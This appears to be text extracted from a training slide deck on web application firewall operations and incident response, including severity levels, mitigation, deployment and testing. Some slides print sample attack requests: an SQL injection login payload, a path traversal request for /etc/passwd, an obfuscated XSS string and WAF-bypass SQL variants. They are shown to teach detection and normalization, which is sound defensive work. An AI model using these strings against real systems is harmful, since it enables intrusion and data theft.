4000
5000
RPS @ Login.php
10.10.10.0 10.10.20.0 10.10.30.0
10.10.40.0 10.10.50. total
Graphs
95. 70295
©
Security Incident log
R1
GET /314355195369564852’2.php HTTP/1.1
User-Agent: (/Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101/,;/>
Pragma: no-cache
Cache-Control: no-cache
Content-Length: -40
Host: sirt.club
R2
TRACK / HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
User-Agent:: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKip/537.36
(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Trace-Test: Nikto
Incident
Incident
Incident
Incident
Incident
R1
R2
R3
R4
Rx
R1
GET /3143551953695648522.php
HTTP/1.1
User-Agent: Mozilla/5.0
Host: sirt.club
Entity: 3143551953695648522.php
Detections: meta char in URL ‘
Prevention: blocking page
Time: 11:12:13
Source IP: 10.0.0.138
R3
OPTIONS /API%20/V1/login HTTP/1.1
User-Agent: Mozilla/5.0 Firefox/11.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Host: sirt.club
Aka: request/Response logs
97. 70295
©
Security Incident Response
▪ Apply to security product/service
▪ Deal with modern threat landscape
▪ Small clear actions
▪ Rapid process
▪ Agile IR
❑ Fast mitigation
❑ Easy to use
❑ Scalable
❑ Repeatable
❑ Measurable
The Money Time
100. 70295
©
► Security Device - WAF Protection elements ( policy )
INVOCATION TYPES
► 3rd party security / monitoring software or services
► Humans – customers complaints, other department personnel nonfiction
Hello support: your app is NOT working !?!?
SUPPORT
LOAD
App dude: hey, its
eating resources $$$
101. 70295
©
INVOCATION – ACT!
▪ Dashboard alert
▪ Email
▪ SMS
▪ Instant messaging
▪ Phone call
WAF notification center
ATTACK!
Message:
• What happen :
• How bad it looks
• How long :
102. 70295
©
1. AM I
• S1 – Service down
• S2 – Major impact
• S3 – General impact
Declare the incident type and Determine the impact
Am I under attack ?
RA – Real attack
FP – False positive
FA – False alarm BTR
Impact
incident type
103. 70295
©
1. AM I
• Severity: S1
• Status: Active Attack
• Damage: Major
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now (4H – 12H)
• Severity: S2
• Status: Active / Immanent
• Damage: Moderate / Potential
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now / Soon (12H – 24H)
• Severity: S3
• Status: Security Related
• Damage: Minor
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Soon/ Later (24H – 3D)
104. 70295
©
1. AM I
• S1 – Service down
• FP: Mass
• Damage: Visible Blocking
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now (4H – 12H)
• Severity: S2
• FP: Many
• Damage: Affecting Traffic
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now / Soon (12H – 24H)
• Severity: S3
• FP: Specific
• Damage: Passive FP
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Soon/ Later (24H – 3D)
105. 70295
©
2. MITIGATION
I. Searching Suspicious indicators (3SIN)
II. Compose Prevention rule (PR)
How to mitigate (Seek & Destroy )
Find Suspicious Indicators (SIN) & Compose Prevention Rule (PR)
• Detection + Prevention = Mitigation
106. 70295
©
I. Suspicious indicators
2. MITIGATION
Attack Elements
▪ Vulnerability
▪ Attack Surface
▪ Attack Agent
▪ Exploit
▪ Attack Vector
▪ AMO
Protection Elements
▪ Signatures - Pattern matching
▪ Anomaly - Aggregation and thresholds
▪ Restrictions - Allow / Block lists
▪ Client Interrogation - HTTP client inspection
GRAPHS
STATISTICS
LOGS
DASHBOARD
REPORTING
108. 70295
©
2. MITIGATION
SIRT FIP
Forensic Investigation Procedure
Classify
Sources
Examine
Patterns
Internet
POST / login.php HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
Content-Length: 59
User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221)
Content-Type: application/x-www-form-urlencoded
username=' or 1=1--&password=123456action=login
I. Suspicious indicators
109. 70295
©
2. MITIGATION
I. Suspicious indicators (3SIN)
II. Prevention rule (PR)
How to mitigate (Seek & Destroy )
Find Suspicious Indicators (SIN) & Compose Prevention Rule (PR)
• Protection Rules – general policy - policy
• Prevention Rule – specific attack - SIR
110. 70295
©
E D P
Prevention Rule
WA-CAV
BRUTE FORCE
ADDoS
VULNERABILITY
HUNTING
AUTOMATED
ATTACKS
2. MITIGATION II. Prevention Rule (PR) • Wide vs narrow rules
• Specific rule vs general rule
Goal:
• Prevention rule / Features
• Few prevention rules / Features
111. 70295
©
3. RESPONSE
I. Apply mitigation strategy
II. Monitor mitigation
Apply prevention rule and verify attack mitigation
Response – Apply & Verify
113. 70295
©
3. RESPONSE
I. Apply mitigation strategy
II. Monitor mitigation
Apply prevention rule and verify attack mitigation
Response – Apply & Verify
114. 70295
©
0
500
1000
1500
2000
2500
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
URL /
✓ BTR – monitoring attack
Response – Apply & Verify
0
500
1000
1500
2000
2500
3000
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
URL /
3. RESPONSE
• Return – bypass
• Return – different approach – same attack
• Revenge – other attack
✓ BTR – EoA – end of attack
115. 70295
©
BTR
Back To Routine (BTR)
Declaring Back to Routine when
attack is being blocked or attack stopped
Win
IR Win
✓ Damage evaluation report
✓ Severity is 0
117. 70295
©
Attending:
▪ SIRT iMgr _________
▪ SE Focal____________
▪ App Dev___________
▪ Dev Ops___________
▪ Mgmt __________
Opportunities :
▪ Short term
▪ Long term
Incident name:
CAV type:
Severity
App name
App type
Attack type
Win/Lose
Cost:
o Direct ______________
o Indirect ____________
o 3rd party ____________
Total IR cost: _____________
Incident details
High lights
Low lights
Response time
Recovery time
Working time
________________
_________________
_________________
AE List:
PE List
Feature name:
RCA
Damage control ▪ Auditor_____________
▪ CxO notification: Y/N datetime
118. 70295
©
1. AM I
2. MITIGATIONS
FINE TUNE
BTR
RA / FP
FP
RA
SEEK
DESTROY 3. RESPONSE
APPLY
VERIFY
SEEK
FIX
132. 70295
©
MESH
NF
NF App srv
App srv
WAF Strategies
Web app
Web app
Web app
CI
A SIG/R
CI
CI
A SIG/R SIG/R
WAFx3: Edge + Perimeter + Mesh
WAFx2: Edge + Perimeter
A SIG/R
WAFx1: Edge / Perimeter
135. 70295
©
Managed Security Security Management Full Security Management
Security Management – types
WAF aaS
❑ Security report
❑ SIR
❑ Policy
❑ Configuration
❑ Setups
❑ Create / updates
❑ Infrastructure - upgrades
❑ Deployment
❑ OS – Scaling
❑ Security report
❑ SIR
❑ Policy
❑ Configuration
❑ Setups - updates
❑ Create / update
❑ Security report
❑ SIR
❑ Policy
❑ Configuration
❑ Setups
❑ Create / updates
❑ Infrastructure - upgrades
❑ Deployment
❑ OS – Scaling
Vendor aaS
You
You
You
❑ Infrastructure
❑ Deployment - upgrades
❑ OS – Scaling
You
137. 70295
©
WAF architecture capabilities (DSMM)
App ❑ Classic ❑ Modern ❑ Mix
Environment
Cloud ❑ Cloud: Public ❑ Cloud Private ❑ Multi cloud ❑ Hybrid (Cloud <-> OP)
On perm ❑ On Prem: Shared Hosting ❑ On Prem: detected hosting ❑ Multi On Prem ❑ Hybrid (OP<->Cloud)
Management
Management ❑ For you ❑ Semi ❑ You
WAF locations ❑ Edge ❑ Perimeter
❑ Perimeter (360)
❑ Mesh
❑ MonoMesh
Software
SW type ❑ HW OS SW ❑ OS SW ❑ SW
Virtualizations ❑ vOS ❑ vSW - Container ❑ vSW – K
Security Mgmt – Sec OPS
Policy level ❑ ID/PS ❑ Bot MGR ❑ WAF ❑ WAF NG
Security Reporting ❑ Security center (learning)
❑ WAG reporting
❑ graphs
❑ Risk reporting
❑ Statistics
❑ Mitigation reporting
❑ Event log
❑ Forensics
OPS
Deployment ❑ ISO file ❑ RPM ❑ VM image
Config ❑ API ❑ Config file ❑ GUI
138. 70295
©
“Keep it up to date and Never drop the ball, YOU are the last in line and own it
Policy
Update
Upgrade
MGMT
HA
Utility
141. 70295
©
Hardware
Operating
System
Virtual - OS
Network
vOS vOS vOS
Hardware
Operating
System
Virtual - container
Network
C1 C2 C3
Hardware
Operating
System
Virtual - Pod
Network
P1 P2 P3
Hardware
Operating
System
Network
Platform
• WAF Software
• Operating System
• Hardware
• WAF Software
• Operating System
• WAF Software
❑ ISO
❑ SW
Deployment
143. 70295
©
High availability
AKA: Fault tolerant -
When master WAF fails
Active / Active
OS
WAF
Hardware
OS
WAF
Hardware
OS
WAF
Hardware
OS
WAF
Hardware
N+1 concept
Active / Stand By
144. 70295
©
WAF 1
WAF 2
WAF 3
WAF 3
WAF 2
Traffic (RPS)
Time
Load balancing Cluster Scaling
Load management
N+1
Primary (A)
Secondary (Burst)
Fault tolerance: (Stand By)
Active
Active
Active
New
Old
Stand By
Stand By
145. WAFcapacity planning - LB
Session persistence
New session
WAF # 1
WAF # 2
App # 1
App # 2
Stand By – online
146. 70295
©
Hardware
Operating
System
Virtual - OS
Network
vOS vOS vOS
Hardware
Operating
System
Virtual - container
Network
C1 C2 C3
Hardware
Operating
System
Virtual - Pod
Network
P1 P2 P3
Hardware
Operating
System
Network
WAF cluster
SB
SB
WAF cluster
WAFcapacity planning – cluster
Stand By – online
148. 70295
©
Standby unit
CLIENTS
A
B
Active unit
a) Update /Upgrade on B (SB)
b) Testing – smoke test or rollback
c) Switching to active unit (A->B)
d) Make A stand by
e) Update /Upgrade on SB (A)
f) Verify ok
Active unit
Standby unit
Upgrade / Updates procedure
a) Create new from ISO – B
b) Import config (from A)
c) Testing – smoke test or new install
d) Traffic route new traffic - B
e) Kill old WAF - A
A
B
149. 70295
©
Centralized Management (CM)
POLICY ALL/APP1
POLICY ALL/APP2
POLICY 20
POLICY 30
POLICY 40
SERVICE: IP:80
SERVICE: IP:8080
SERVICE: IP:8008
POLICY LOGIN/APP2 APP2
APP1
App # 20
App # 30
App # 40
Centralized
Management
152. 70295
©
3. REPORTING - VISUALIZATION
2. CONTROL PLAIN – SETTINGS
1. DATA PLAIN
GUI API CONFIG File
Configuration
E D P
E D P
153. 70295
©
Create
Signatures:
❑ Information
❑ Generic
❑ CVE
Parameter name:
Parameter value:
Policy Name: main_App | notification (21)| incident log | support panel
Create New Parameter
Online help | Contact vendor support
*
q
search.php
CLIENTS
Configuration – GUI
154. 70295
©
NF
WAF NG
{ API }
Mobile client App
Mobile Browser
LT/ PC Browser
{ API }
LT/ PC CLI
{ API }
{ API }
{ API }
Configuration – API
Policy {Main_app}
Parameter {q}
Signatures {specific CVE family}
Prevention action {alert , blocking page}
WAF API Collection :
{ API }
3rd party
155. 70295
©
NF
WAF NG
{ API }
WAF config file:
Policy: Main_app
<config>
Define Parameter : q
Configure signatures – specific CVE
Apply – prevention action: alert , blocking page
</config>
Configuration – Config file
#load new config
156. 70295
©
Log format:
✓ Request: URL, Headers, QS,PD, Meta character
✓ Response: headers , post data , meta data
✓ WAF: ALL reporting (raw)
✓ WAF meta data: signature, hit on, CRLF, encoding
Log repository
Indexing
Reporting
Ingress
✓ Sys log
✓ SIEM
✓ Repo
Set ups
Egress
158. 70295
©
Reporting
WAF LOGS
AUDIT
MAINTENANCE
SYSTEM
o Audit – who did what – changes to policy
o Maintenance – update / upgrade fails
o System – memory, configuration
SECURITY REPORTING
SUPPORT REPORTING
3. REPORTING - VISUALIZATION
2. CONTROL PLAIN – SETTINGS
1. DATA PLANE - WAF ENGINES
GRAPHS
STATISTICS
LOGS
DASHBOARD
159. 70295
©
WAF LOGS
AUDIT
MAINTENANCE
SYSTEM
SUPPORT REPORTING
o Audit – who did what – changes to policy
3. REPORTING - VISUALIZATION
2. CONTROL PLAIN – SETTINGS
o Maintenance – update / upgrade fails
o System – memory, configuration
#User admin access from IP X on Sunday 1:01 AM GTM
#User admin change policy to allow access from IP Y
#User admin reboot me
Upgrade is needed to version X
Update failed
Updates for version X is success
Resources allocation memory increase in 5M total of 16GB
CPU spike to 90% for 10 minutes
160. 70295
©
Utilities
Logging ❑ Local ❑ Remote ❑ All request ❑ Hits only
Log Repository ❑ Internal ❑ External ❑ Size: 6T
❑ Time: 6-month request
❑ Fault tolerance
3rd party ❑ ICAP ❑ Network FW integration
CM ❑ Local
❑ Dedicated
❑ CP utility
❑ Pull / push config
❑ Update/ upgrades
❑ WAF centralized report
❑ Policy
Traffic aggregation (unified
reporting )
Updates and upgrades
Updates ❑ Break Fix
❑ CVE updates
❑ New features
❑ Hotfix
❑ Engineer hot fix
❑ Full update file
❑ GUI
❑ API
❑ Config
❑ RPM
❑ SW
❑ ISO – OS + SW
❑ ISO – SW
Upgrade ❑ Migration tools ❑ WAF Config restore ❑ Rollback
Upgrades / upgrade schema ❑ Stand by / Active ❑ Active / Active ❑ New / old
Life time policy ❑ Sustain release ❑ Feature release ❑ Product life time ❑ Support life time
HA
HA ❑ Load balancing ❑ Cluster ❑ Scaling
Support tools
Support reporting ❑ Audit log ❑ Maintenance ❑ System ❑ Debug
Policy export – restore ❑ Text
❑ HTML
❑ Binary ❑ JSON
❑ XML
❑ Manual GUI
❑ API
162. 70295
©
WAF Management
POLICY ALL/APP1
POLICY ALL/APP2
POLICY 20
POLICY 30
POLICY 40
SERVICE: IP:80
SERVICE: IP:8080
SERVICE: IP:8008
POLICY LOGIN/APP2
• Site level
• Zone level
• App level
CI A SIG/R
• Edge -> screening
• Perimeter -> classic
• Mesh -> microservice
167. 70295
©
WA-CAV policy
Anti
Auto
Anti
floods
Anti bf
Anti
web
exploit
Multi layer security solution
AUTOMATED
ATTACKS
WEB EXPLOITS
BRUTE FORCE
ADDoS
CI: First request
CI: First response
A: Session opening rate
A: RPS increase on Session
S: User agent
A: RPS from IP
A: RPS to URL
A: RPS from Geo
A: RPS from session
A: RPS from IP to login URL
A: RPS from any IP to login URL
A: RPS from Geo to login URL
A: RPS from session to login URL
S: Specific CVE exploits
S: Generic exploits
R: Meta char on parameter values
R: Anti evasions
168. 70295
©
Parser - Entities
Protocols ❑ HTTP 1.1 ❑ API ❑ Mobile API
Payloads ❑ Text ❑ JSON ❑ XML
User input ❑ Login ❑ Search text ❑ Posting
Traps - Detections
Signature ❑ Informational (W,B,D) ❑ Generic exploits (W,B,D) ❑ Specific exploit (W)
Anomaly ❑ Request per second (W,B,D) ❑ Failed log in (B) ❑ Session opening (W,B,D)
Restriction ❑ Characters sets (W,B) ❑ RFC & evasion (W,B,D) ❑ Flow
Client interrogation ❑ CAPTHCA (W,B,D) ❑ Client capabilities (W,B,D) ❑ Source ID (SID) (W,B,D)
Enforcer - Prevention Action
ALERT ❑ GUI: dashboard / iLog [M] ❑ Email / SMS ❑ Instant messaging
BLOCK ❑ Blocking page [M] ❑ TCP FIN / RESET /Drop [M] ❑ Stripping / Cloaking
LIMIT ❑ Rate limiting (RPS) [M] ❑ Time limiting [M] ❑ Session limiting
FOLLOW UP ❑ Redirect to main / honeypot ❑ Soft Blocking ❑ Retaliation
Protection elements -> PR
169. 70295
©
CI
A SIG/R
Scrubbing center
Threat actors
Risky users/ traffic
MVU – Most valuable users
PVU - Potential valuable users
Authorized automation
Users group – WAF as a traffic manager
Partners
3rd Party
171. 70295
©
Forensic Investigation Procedure
S
M
V
Classify Sources
• Source IP – RPS
• Source IP – sessions
• Source IP geo
Classify client
• Simple client / simple bot
• Browser / full browser bot
• Human / full human bot
Classify Pattern
• Well formed
• Structure
• Position
Verdict
• V: Clearly good user request
• M: Clearly harmful request
• S: Potentially harmful
Prevention Action:
✓ Allow
✓ Exempt – all/ partial
X Block – specific request / IP
X Shun – all traffic from IP/session
? Monitoring – need more data
Forensic Investigation Procedure (SIRT FIP)
/
A B
Classify Actions
• CRUD
• Flow
• Timeline
172. 70295
©
Simple bot
Full Browser Bots
Full Human Bots
CI – L1
Browser base test
CI – L2
Browser Attributes
CI – L3
Mouse movements
HTTP Client Classification
Simple client
Browser client
Human client
Pass / Fail
173. 70295
©
Device IP Sessions RPS Flow / Top URL’s
Laptop
New 10 100
Register
Login
Cart
Pay
PC
Returning 15 1000
Browse_IS
Login
Pay
IOT
New 1000 25000
/ping
/swcheck
Mobile phone –
browser
Returning 150 3500
/sell
/browser?ID=
Mobile phone –
App
New 2 30
appmobile/V1/
Classify sources: Clients / sources / users – RPS – Historical
174. 70295
©
Security Request log
R1
GET /314355195369564852’2.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101
Firefox/39.0
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Host: sirt.club
R2
TRACK / HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Trace-Test: Nikto
Incident
Incident
Incident
Incident
Incident
R1
R2
R3
R4
Rx
R1
GET /3143551953695648522.php
HTTP/1.1
User-Agent: Mozilla/5.0
Host: sirt.club
Entity: 3143551953695648522.php
Detections: meta char in URL ‘
Prevention: blocking page
Time: 11:12:13
Source IP: 10.0.0.138
R3
OPTIONS /API/V1/login HTTP/1.1
User-Agent: Mozilla/5.0 Firefox/11.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Host: sirt.club
Classify Pattern
• ETF
• ATF
• User input
• Well known
• Context
175. 70295
©
User action and flow
/
Info
dynamic
products
ProductID
Cat
Login
username
password
Account
Username
email
Payment
pay
CCN
checkout
amount
password
a) Main page browser
b) Link: Login page
c) Bookmark: account
d) Login
a) Browse /add items
b) Login
c) Auto Login
d) login
a) Check out
b) Update CCN
c) Browser items
d) Login
a) Payment
b) Browse Items
c) Payment
d) Login
1 min
2min
30sec
1 sec
2 sec
1.5 sec
Classify Actions
177. 70295
©
% Case insensitive
% Comments
% Encoding
% Tricks and Koontz
Goal: bypass the WAF protections
WAF Bypass and Normalization
GET /search.php?q=../../../../../../etc/passwd HTTP/1.1
GET /search.php?q=< < < < < < HTTP/1.1
GET /search.php?q=
SRC=javascr

5;pt:alert
('XSS')>
GET /search.php?q=" ' exploit & < >
179. 70295
©
Normalization – Anti Bypass
GET /search.php?q=ExPloiT HTTP/1.1
Host: sirt.club
Norm WAF Signature
Change to lower case exploit
Remove comment in the parameter
value -> match sig
‘and 1=0 union select all from table;
Any True condition in the parameter
value -> match sig
Any OR X = X/Y - block
GET /search.php?q=' and 1=0 un/**/ion/**/sel/**/ect all f/*haha*/rom table HTTP/1.1
Host: sirt.club
OR ‘bypass' = ‘bypass’
OR ‘Bypass’ = A’Bypass'
OR 'Koontz' = ' Koo'+'ntz'
OR 'Koontz' LIKE ‘Koo%'
OR 'Koontz' > ‘K'
OR 'Koontz' < ‘Z'
181. 70295
©
0
1
2
3
4
5
6
7
off hours monring monring noon noon after noon after noon off hours off hours
Main App
Users Partners Attack
AMO 1. Riding the wave
2. Decoy
3. Multi vector
1.App Stress
2.Vul hunting
3.Brute force
183. 70295
©
Attack Elements
▪ Vulnerability
▪ Attack Surface
▪ Attack Agent
▪ Exploit
▪ Attack Vector
▪ AMO
GRAPHS
STATISTICS
LOGS
DASHBOARD
REPORTING
• Entities
• Detections
• Prevention
• Rule
• Rule sets
Protection elements
Protection rule
Protection policy
PROTOCOL
PAYLOAD – HEADERS
USER INPUT
SIGNATURES
ANOMALY
RESTRICTIONS
CLIENT INTERROGATION
ALERT
BLOCK
LIMIT
FOLLOW UP
Search the AE’s in the PE’s using the reporting to stop the attacks with Prevention rules
Relationships : AE, PE, Policy and Reporting
184. 70295
©
PR
No Hits
OK FN
Hits
RA FP
1. Enforce
2. Monitoring -> Refine
3. Enforce
4. Alert -> Refine
Block -> alert – refine
1 2 3 4
Rule maturity = Time + Traffic
Handling RA/FP/FN/FA
1. RA – Real Attack: true attack needs blocking
2. FP – False Positive: wrong detection (blocking but shouldn’t)
3. FN – False Negative: lack of detection (should be blocked but not)
4. FA – False alarm: mistake
185. 70295
©
BTR
AMI Vulnerable AMI Under attack AMI Compromised
2. MITIGATIONS
SEEK
DESTROY
SEEK
PREVENT
Y/N
APPLY
VERIFY
SEEK
RECOVER
APPLY
VERIFY
APPLY
VERIFY
N=BTR
3. RESPONSE
SEVERITY
Y/N
SEVERITY
RA/FP/FN
SEVERITY
186. 70295
©
WA-CAV Score - Site
Brute force App DDoS Vul Hunting
60% 80% 50%
By
requirement*
Traffic Break Down Valuable users - Allow Suspicious - Monitor Malicious – Block
App A 71% 6% 25%
App B 20% 20% 60%
App C 61% 20% 17%
Security Level
63.3% 58.2%
SECURITY
CENTER
187. 70295
©
App Attacks
Incidents
WAF health – site
Site Traffic
E:H D:S BLOCK
E:URL D:A ALARM
1IP 100 Req
Critical
E:IP D:R RATE LIMIT
Medium
High 1IP 10Req
10IP 1000Req
56.00%
58.00%
60.00%
62.00%
64.00%
66.00%
68.00%
70.00%
72.00%
App 1 App2 App3 App4
80% 95% 95%
20% 23% 31%
WAF A – Zone 1 (Main)
WAF B – Zone 2 (sub)
CPU Memory Bandwidth
CPU Memory Bandwidth
By
requirement*
193. 70295
©
App: main Number of visits
Time:
/Search engine
Per 1 day Per 1 week Per 1 month
Search engine A 2 10 20
Search engine B 0 2 6
Search engine C 10 150 3000
Traffic break down Valuable customers
(allowed)
Allowed automation Suspicious monitored Malicious – blocked
App A 71% 2% 6% 21%
App B 20% 1% 20% 59%
App C 61% 1.5% 20% 17%
Valuable users – customers – Breakdown
Total RPS 11,000 80000
Top URL 22,000 RPS 11,0000
Total session 12000 active sessions
8000 new sessions
1000 active sessions
8000 new sessions
IP/ session IP-X (3000)
IP-Y (1200)
IP-Z (2000)
IP-X (2300)
IP-Y (1000)
IP-Z (1500)
WAF - Visibility manager
195. 70295
©
WAF levels: Signature Anomaly Restrictions Client interrogation
ID/PS Yes No No No
Bot Manager No No No Yes
WAF Yes Yes Yes No
WAF NG Yes Yes Yes Yes
WAF levels by PE (detection)
*Full requirements in SIRT.club
WAF levels: Web Exploit Brute Force aDDoS Automated traffic
ID/PS Partial Limited Limited Limited
Bot Manager Partial Partial Partial Partial
WAF Good Best Best Good
WAF NG Best Best Best Best
196. 70295
©
Parser - Entities
Protocols ❑ HTTP 1.1 ❑ API ❑ Mobile API
Payloads ❑ Text ❑ JSON ❑ XML
User input ❑ Login ❑ Search text ❑ Posting
Traps - Detections
Signature ❑ Informational ❑ Generic exploits ❑ Specific exploit
Anomaly ❑ Request per second (RPS) ❑ Failed log in (FLI) ❑ Session opening
Restriction ❑ Characters sets ❑ RFC & evasion ❑ Flow
Client interrogation ❑ CAPTHCA ❑ Client capabilities ❑ Source ID (SID)
Enforcer - Prevention Action
ALERT ❑ GUI: dashboard / iLog ❑ Email / SMS ❑ Instant messaging
BLOCK ❑ Blocking page ❑ TCP FIN / RESET /Drop ❑ Stripping / Cloaking
LIMIT ❑ Rate limiting (RPS) ❑ Time limiting ❑ Session limiting
FOLLOW UP ❑ Redirect to main / honeypot ❑ Soft Blocking ❑ Retaliation
WAF policy requirement (DSMM) by PE
197. 70295
©
WAF RFP
App ❑ Classic ❑ Modern ❑ Mix
Location
Cloud ❑ Cloud public ❑ Cloud Private ❑ Multi cloud ❑ Hybrid (cloud <-> op)
On perm ❑ On perm ❑ multi on perm ❑ Hybrid (op<->cloud)
Management
Management ❑ For you ❑ Semi ❑ You
WAF type ❑ Edge ❑ Perimeter
❑ Perimeter (360)
❑ Mesh
Software
SW type ❑ HW OS SW ❑ OS SW ❑ SW
Virtualizations ❑ vOS ❑ vSW - Container ❑ vSW – K
Security Mgmt – Sec OPS
Policy level ❑ ID/PS ❑ Bot MGR ❑ WAF ❑ WAF NG
Security Reporting ❑ Security center
(learning)
❑ WAG reporting
❑ graphs
❑ Risk reporting
❑ Statistics
❑ Mitigation reporting
❑ Event log
❑ Forensics
OPS
Deployment ❑ ISO file ❑ RPM ❑ VM image
Config ❑ API ❑ Config file ❑ GUI ❑ ______
WAF requirement (DSMM)
198. 70295
©
Utilities
Logging ❑ Local ❑ Remote ❑ All request ❑ Hits only
Log Repository ❑ Internal ❑ External ❑ Size: 6T
❑ Time: 6-month request
❑ Fault tolerance
3rd party ❑ ICAP ❑ Network FW integration
CM ❑ Local
❑ Dedicated
❑ CP utility
❑ Pull / push config
❑ Update/ upgrades
❑ WAF centralized report
❑ Policy
Traffic aggregation (unified
reporting )
Updates and upgrades
Updates ❑ Break Fix
❑ CVE updates
❑ New features
❑ Hotfix
❑ Engineer hot fix
❑ Full update file
❑ GUI
❑ API
❑ Config
❑ RPM
❑ SW
❑ ISO – OS + SW
❑ ISO – SW
Upgrade ❑ Migration tools ❑ WAF Config restore ❑ Rollback
Upgrades / upgrade schema ❑ Stand by / Active ❑ Active / Active ❑ New / old
Life time policy ❑ Sustain release ❑ Feature release ❑ Product life time ❑ Support life time
HA
HA ❑ Load balancing ❑ Cluster ❑ Scaling
Support tools
Support reporting ❑ Audit log ❑ Maintenance ❑ System ❑ Debug
Policy export – restore ❑ Text
❑ HTML
❑ Binary ❑ JSON
❑ XML
❑ Manual GUI
❑ API
WAF requirement (DSMM)
199. 70295
©
Web app
App
Web app
Virtualization –OS/HW
Web
Server
App
Server
Database
Server
Testing types App WAF
Testing app for vulnerability
Testing infrastructure for
vulnerabilities
Testing traffic loads
Testing scaling mechanism
Testing supply chain for
vulnerabilities
Testing functionality
Testing hardening n defaults
Testing User input
Testing fuzzing
Testing coverage
201. 70295
©
Web app
App
Web app
Virtualization –OS/HW
Web
Server
App
Server
Database
Server
Testing App without WAF
Security testing – App / WAF
Testing the WAF
Testing App with WAF
✓ AE testing - RA
✓ PE testing –CAV/SAP
✓ SE testing - FN
202. 70295
©
Brute force App DDoS Web exploit
60% 70% 50%
Automated attacks
35%
Traps - Detections
Signature ❑ Information ❑ Generic exploits ❑ Specific exploit ❑ Customer
Anomaly ❑ Request Sec (RPS) ❑ Failed log in (FLI) ❑ Session increase ❑ Session opening
Restriction ❑ Characters sets ❑ RFC & evasion
❑ Evasion
❑ Flow ❑ Structure
Client interrogation ❑ CAPTHCA ❑ Client capabilities ❑ Source ID (SID) ❑ If then
Enforcer - Prevention Action
ALERT ❑ GUI: dashboard / iLog ❑ Email / SMS ❑ Instant messaging ❑ Mobile App
BLOCK ❑ Blocking page ❑ TCP FIN / RESET
❑ Drop connection
❑ Stripping / Cloaking
LIMIT ❑ Rate limiting (RPS) ❑ Time limiting ❑ Session limiting ❑ Access limiting
FOLLOW UP ❑ Redirect to main ❑ Redirect to honeypot ❑ Soft Blocking
WAF assessment
203. 70295
©
How to test it
NF
Vulnerability scanner
Pen test
Red team
Router NWFW WAFNG ADC/LB
Security controls test
Vulnerability scanner (CVE)
Pen test – manual / crafted botnets
Bug bounty - mass wisdom
Red team - proprietary tools
204. 70295
©
• Testing for Vulnerability in the web application
• Use WAF to virtual patch
• Patch the app
• Testing for Vulnerability in the WAF
• Patch the WAF
• DP vs CP
• WAF Bypass – WAF can be bypass but no vulnerability in
the web app to protect
• Fix the WAF
• Holistic approach
• Security exposure – WAF can be bypass and exposing the
web app to a vulnerability that exits (FN)
• Fix the WAF
• Holistic approach
Vulnerability and Security exposure
206. 70295
©
SOC
SECURITY TEAM
External STA
SECURITY TESTING
Testing Personnel
Internal STA
CSIRT
PSIRT
PSIRT – Patching products/ application
CSIRT – Any type of attack on/in the org
STA – Org security advisor / SGP / assessment
3RD PARTY
EVALUATOR SECURITY
TESTING
207. 70295
©
WAF security score - internal
Brute force App DDoS Vul Hunting
WAF security score - external
I: 60%
E: 60%
A: 60%
I: 80%
E: 70%
A: 75%
I: 40%
E: 50%
A: 45%
WAF assessment security score:
• Internal testing
• External testing
• Average
WAF assessment
208. 70295
©
Service
Data
Compute
Disruption
Breach
Compromised
• Ami under attack
• Ami vulnerable
• Ami compromised
• Entities
• Detections
• Prevention
• Rule
• Rule sets
Protection elements
Protection rule
Protection policy
CURRENT POLICY
BYPASS POLICY
MISSING POLICY
FN – missing
RA – rules set
FP – clean traffic
SE – bypass
Current
Limitation
improve
Pre prod
Base prod
Post prod
213. 70295
©
GM
Sr SE
SIRT scaling VP
Mgr NA
SME
Sr SE
SE
Jn SE
Mgr WW
SME
Sr SE
SE
Dir SIRT
Dir
Mgr NA
Sr SE
SE
Jn SE
• CSIRT
• PSIRT
• TASIRT
CSIRT
PSIRT
TASIRT
TASIRT
PSIRT
CSIRT PSIRT
CSIRT
CSIRT
PSIRT
215. 70295
©
Security Personnel – Traditional
CODERS
ARCHITECT
Staging
ENV
Prod
ENV
DEV
OPS
NF
WAF NG
Application
Server/s
Web
Server/s
Database
Server/s
▪ Deployment – WAF/NF/LB, DNS,
▪ Networking
▪ HW, SW – install, update, upgrade
▪ Storage
▪ ….
▪ Developing the Web App
▪ Web servers
▪ App server
▪ Data bases
▪ Sessions management
▪ Functionality
▪ ….
Where should security be ?
216. 70295
©
Security Personnel – Modern
CODERS
ARCHITECT
Staging
ENV
Prod
ENV
DEV
OPS
NF
WAF NG
▪ App – CIA
▪ Resources
▪ Security
▪ ….
▪ Developing the Web App
▪ Microservices
▪ Containerized
▪ Functionality
▪ ….
DEV OPS
▪ Deployment – WAF/NF/LB, DNS,
▪ Networking
▪ HW, SW – install, update, upgrade
▪ Storage
▪ ….
Where should security be ?
Dev
ENV
218. 70295
©
SE Matrix
Knowledge (theory) Skills (hands on) Experience (time) Notes
Jr SE Sr A STA Jr SE Sr A STA Jr SE Sr A STA
Target Y Y Y Y Y i ii iii iii iii
1Y 3Y 6Y 10Y 14Y
Attack Y Y Y Y Y ii iii iii iii iii
Security Y Y Y Y ii iii iii iii iii
Policy Y Y Y Y i i iii iii iii
Incidents Y Y Y ii iii iii iii
Architecture Y Y i iii ii iii
Operations Y Y Y Y ii i i iii
Traffic control Y Y iii iii iii
